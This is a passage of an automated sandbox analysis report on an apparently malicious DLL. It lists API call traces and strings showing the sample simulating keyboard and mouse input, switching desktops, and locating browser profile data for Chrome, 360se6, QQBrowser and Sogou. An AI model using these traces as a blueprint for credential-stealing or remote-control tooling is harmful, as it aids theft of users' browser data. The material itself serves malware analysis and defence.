                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: .$2$3$K$L$N$R$S$d$n$v
                                                  • API String ID: 2574300362-924470386
                                                  • Opcode ID: 0be4a78ea3ca6789cddf9191ef90585fe08e7675e10535fba2f937f710853e8b
                                                  • Instruction ID: f587192977155dba1771fbf980f3db4c254de801381f46c0f03346595a95ac4e
                                                  • Opcode Fuzzy Hash: 0be4a78ea3ca6789cddf9191ef90585fe08e7675e10535fba2f937f710853e8b
                                                  • Instruction Fuzzy Hash: CC318075D092CCDEDB01CBE8D884ADEFFB8AF2A240F084159E54577382C2794608CBB6
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetCurrentThreadId,75570BD0,00000000,?,7556F550), ref: 1002BF0A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BF13
                                                  • LoadLibraryA.KERNEL32(USER32.dll,GetThreadDesktop,?,7556F550), ref: 1002BF21
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BF24
                                                  • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 1002BF48
                                                  • SetThreadDesktop.USER32(?,?,7556F550), ref: 1002BF5E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$DesktopInformationObjectThreadUser
                                                  • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$KERNEL32.dll$USER32.dll
                                                  • API String ID: 2607951617-608436089
                                                  • Opcode ID: c0c3ea56cdc1080090144fbb2db9b1c23dc684a9b29fcc628cfea7fef181f00d
                                                  • Instruction ID: 7782cd6523706058525b38559df4a6a9aebe8a97a2597f955c92ab7f26c7b295
                                                  • Opcode Fuzzy Hash: c0c3ea56cdc1080090144fbb2db9b1c23dc684a9b29fcc628cfea7fef181f00d
                                                  • Instruction Fuzzy Hash: 2E01D8B674031C2BE610A7B9BC88EDB774CEBC0761F850532FB04D2141EA6DA84596B4
                                                  APIs
                                                  • LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                    • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                    • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                  • GetDC.USER32(00000000), ref: 10017E52
                                                  • QueryPerformanceFrequency.KERNEL32(00000030), ref: 10017E5F
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017E81
                                                  • GetDeviceCaps.GDI32(?,00000076), ref: 10017E9E
                                                  • GetDeviceCaps.GDI32(?,00000075), ref: 10017EA9
                                                  • CreateCompatibleDC.GDI32(?), ref: 10017EC7
                                                  • CreateCompatibleDC.GDI32(?), ref: 10017ED0
                                                  • CreateCompatibleDC.GDI32(?), ref: 10017ED9
                                                  • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 10017F26
                                                  • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10017F37
                                                  • SelectObject.GDI32(?,?), ref: 10017F4A
                                                  • SelectObject.GDI32(?,?), ref: 10017F54
                                                  • #823.MFC42(?,?,?,?,00000000), ref: 10017F5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$Compatible$CapsDeviceObjectSectionSelect$#823CursorFrequencyLoadPerformanceQueryReleaseUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1396098503-0
                                                  • Opcode ID: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                  • Instruction ID: f5b09e1389df2f3a8d9c5176518bf7bbc65b6c3c0f8f13021ea446bacafcd8a0
                                                  • Opcode Fuzzy Hash: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                  • Instruction Fuzzy Hash: 2981F2B5504B459FD320CF29C884A6BFBF9FB88704F008A1DE58A87750DB79F8058B91
                                                  APIs
                                                    • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                    • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                    • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                    • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                    • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                  • SetCursorPos.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A28
                                                  • WindowFromPoint.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A30
                                                  • SetCapture.USER32(00000000,?,?,?,?,1001751F,?,?,00000000), ref: 10017A37
                                                  • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A4D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10017A50
                                                  • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A5E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10017A61
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10017A9A
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10017AB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                  • String ID: USER32.dll$keybd_event$mouse_event
                                                  • API String ID: 1441364844-718119381
                                                  • Opcode ID: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                  • Instruction ID: 2451a04a9bde1e7bfa8f86e37c24795d67c21f324d001409fd558fbe77f3f18c
                                                  • Opcode Fuzzy Hash: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                  • Instruction Fuzzy Hash: AD515B31BC471576F234CA648C87F4A7AA4FB85F90F708611B708BE1C4D6F0F980869A
                                                  APIs
                                                    • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                    • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                    • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                    • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                    • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                  • SetCursorPos.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D88
                                                  • WindowFromPoint.USER32(?,?,?,?,?,?,1001697A,?,?), ref: 10016D90
                                                  • SetCapture.USER32(00000000,?,?,?,?,1001697A,?,?), ref: 10016D97
                                                  • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001697A,?,?), ref: 10016DAD
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10016DB0
                                                  • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001697A,?,?), ref: 10016DBE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10016DC1
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10016DFA
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10016E14
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                  • String ID: USER32.dll$keybd_event$mouse_event
                                                  • API String ID: 1441364844-718119381
                                                  • Opcode ID: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                  • Instruction ID: 9bdd7654e0fc0f02893d67ce9a41b80379b50915a00eb774664f2f349eb60d67
                                                  • Opcode Fuzzy Hash: 08bcb3d6ed205dffc589dff17d9e7e4658589abb0dcfe27e4ec1cfb246dd7a1a
                                                  • Instruction Fuzzy Hash: C3515E3ABC0729B7F630DA64CD47F5A6A94EB49F90F314615B704BE1C1D5F0F8808A99
                                                  APIs
                                                    • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                    • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                  • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D12
                                                  • LoadLibraryA.KERNEL32(CHROMEUSERINFO.dll,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002D22
                                                  • GetProcAddress.KERNEL32(00000000,fnGetChromeUserInfo), ref: 10002D3E
                                                  • GetProcAddress.KERNEL32(00000000,fnDeleteChromeUserInfo), ref: 10002D4C
                                                  • LocalReAlloc.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E53
                                                  • LocalSize.KERNEL32(00000000), ref: 10002E5C
                                                  • LocalFree.KERNEL32(00000000,?,00000042,?,?,?,?,?,?,?,?,?,?,?,10097C58,000000FF), ref: 10002E6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Local$AddressProc$AllocLibraryLoad$FreeSize
                                                  • String ID: CHROMEUSERINFO.dll$CHROME_NO_DATA$CHROME_UNKNOW$fnDeleteChromeUserInfo$fnGetChromeUserInfo
                                                  • API String ID: 1379963177-1650604611
                                                  • Opcode ID: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                  • Instruction ID: 13833c0b53df42460e1e6170d0b02e4772bea98369ed9403c64bee1aaa194fbe
                                                  • Opcode Fuzzy Hash: 40e86dac1dae070f7c70b1330ff765b42097cb6cefb2778c80bb74e439fd16d3
                                                  • Instruction Fuzzy Hash: DF4123716002585FD728CF288C45AAF7BD5FB8A7A0F580729F90AE7780CB79DE018791
                                                  APIs
                                                  • #537.MFC42(360se6.exe), ref: 1000F047
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F05F
                                                  • #540.MFC42 ref: 1000F069
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F09B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0B3
                                                  • #800.MFC42(0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0C4
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Roaming\360se6\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F0CE
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000F0ED
                                                  • #800.MFC42 ref: 1000F101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: 360se6.exe$C:\Users\$\AppData\Roaming\360se6\User Data\Default
                                                  • API String ID: 1983172782-1244823433
                                                  • Opcode ID: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                  • Instruction ID: e9c89288d271108546bef61020c2a1418b1faed9b041f6e65e1a09c7bde258f6
                                                  • Opcode Fuzzy Hash: 18c021ef16c137c05664ca6647b8b755146eec05a8d0a1cea44dfa32c53753fd
                                                  • Instruction Fuzzy Hash: F6216579408788ABE364DB54D942FDFB7D4EB84710F40891CF29D821D6EB74A504CBA3
                                                  APIs
                                                  • #537.MFC42(QQBrowser.exe), ref: 1000F147
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                    • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                    • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                    • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                    • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                    • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                    • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 1000F15F
                                                  • #540.MFC42 ref: 1000F169
                                                  • #926.MFC42(00000002,C:\Users\,0000005C), ref: 1000F19B
                                                  • #924.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1B3
                                                  • #800.MFC42(0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1C4
                                                  • Sleep.KERNEL32(000003E8,0000005C,00000000,\AppData\Local\Tencent\QQBrowser\User Data\Default,00000002,C:\Users\,0000005C), ref: 1000F1CE
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                    • Part of subcall function 1000BD50: ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                    • Part of subcall function 1000BD50: ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                    • Part of subcall function 1000BD50: ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                    • Part of subcall function 1000BD50: ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                    • Part of subcall function 1000BD50: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                    • Part of subcall function 1000BD50: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                    • Part of subcall function 1000BD50: FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                    • Part of subcall function 1000BD50: ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • #800.MFC42 ref: 1000F1ED
                                                  • #800.MFC42 ref: 1000F201
                                                  Strings
                                                  • QQBrowser.exe, xrefs: 1000F142
                                                  • \AppData\Local\Tencent\QQBrowser\User Data\Default, xrefs: 1000F1A0
                                                  • C:\Users\, xrefs: 1000F195
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$#800$Process32Tidy@?$basic_string@$#4202#537#5572FirstNext$#540#924#926?append@?$basic_string@CreateD@2@@0@Eos@?$basic_string@FileFindFolderFreeze@?$basic_string@Grow@?$basic_string@Hstd@@PathSleepSnapshotSpecialToolhelp32V10@V12@V?$basic_string@Xran@std@@
                                                  • String ID: C:\Users\$QQBrowser.exe$\AppData\Local\Tencent\QQBrowser\User Data\Default
                                                  • API String ID: 1983172782-2662846904
                                                  • Opcode ID: d929c9d7e6e2ddc006b7321b863d3d1fcb39d8f080301b7359882cf3280fcb7a
                                                  • Instruction ID: b508ae645e237c7229c1d69a2e2dd707763a9c57ac4a9714039cccd54a056aaa
                                                  • Opcode Fuzzy Hash: d929c9d7e6e2ddc006b7321b863d3d1fcb39d8f080301b7359882cf3280fcb7a
                                                  • Instruction Fuzzy Hash: C9216579408788ABE254DB54D942FDEB7D4EF84710F40891CF19D821D6EB74A504CBA3
                                                  APIs
                                                  • #537.MFC42(SogouExplorer.exe), ref: 1000F247
                                                    • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                    • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                    • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
